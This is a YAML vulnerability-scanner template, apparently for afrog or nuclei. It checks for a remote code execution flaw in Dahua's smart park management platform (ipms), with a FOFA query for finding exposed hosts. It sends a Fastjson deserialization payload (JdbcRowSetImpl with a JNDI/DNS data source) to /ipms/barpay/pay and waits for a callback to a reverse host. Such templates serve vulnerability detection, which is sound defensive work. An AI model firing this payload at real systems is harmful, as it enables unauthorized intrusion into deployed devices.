id: dahua-ipms-rce

info:
  name: 大华智慧园区综合管理平台 ipms 远程代码执行漏洞
  author: zan8in
  severity: critical
  verified: true
  description: |
    FOFA: body="/WPMS"
    header_string = "hauc"
  tags: dahua,rce
  created: 2023/09/04

set:
  reverse: newReverse()
  reverseHost: reverse.url.host
rules:
  r0:
    request:
      method: POST
      path: /ipms/barpay/pay
      headers:
        Content-Type: application/json
      body: |
        {"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "dns://{{reverseHost}}}", "autoCommit": true}
    expression: reverse.wait(5)
expression: r0()